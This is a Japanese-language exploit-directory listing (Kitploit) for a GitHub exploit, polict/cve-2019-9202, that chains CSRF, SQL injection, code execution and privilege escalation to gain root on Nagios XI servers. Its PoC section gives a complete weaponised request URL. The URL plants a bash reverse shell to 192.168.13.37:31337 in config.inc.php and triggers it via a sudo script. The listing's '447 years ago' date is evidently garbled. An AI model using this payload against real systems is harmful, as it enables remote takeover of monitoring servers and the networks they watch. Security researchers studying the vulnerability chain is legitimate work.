Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/polict/cve-2019-9202
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubpolict/cve-2019-9202

CVE-2019-9202

Nagios IM 2.6 リモートコード実行エクスプロイト: CSRF + SQLi + RCE + LPE --> リモートルート

リポジトリを見る
447年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-9202

Nagios IM 2.6 リモートコード実行エクスプロイト: CSRF + SQLi + RCE + LPE --> リモートルート

説明

Cross-Site Request Forgery (CSRF) / 認証バイパス (CVE-2019-9203) を連鎖させることで、UnionベースのSQLインジェクション (CVE-2019-9204)、リモートコード実行 (RCE) (CVE-2019-9202)、およびローカル特権昇格 (LPE) (CVE-2019-9166) を悪用し、リモートのNagios XIサーバー上でroot権限を取得することが可能です。

必要条件

被害者はNagios XIに認証されている必要があります。私の知る限り、最低限の権限で十分です。

PoC

http://nagiosxi.local/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update&token=&incident_id='union%20select%201,2,3,4,"';echo%20%27print%28\"bash+-i+%3e%26+/dev/tcp/192.168.13.37/31337+0%3e%261+%23\"%29%3b'%3e%3e+/usr/local/nagiosxi/html/config.inc.php%3b+sudo+/usr/local/nagiosxi/scripts/repair_databases.sh%3b%23",6,7,8,'x

ツールをダウンロード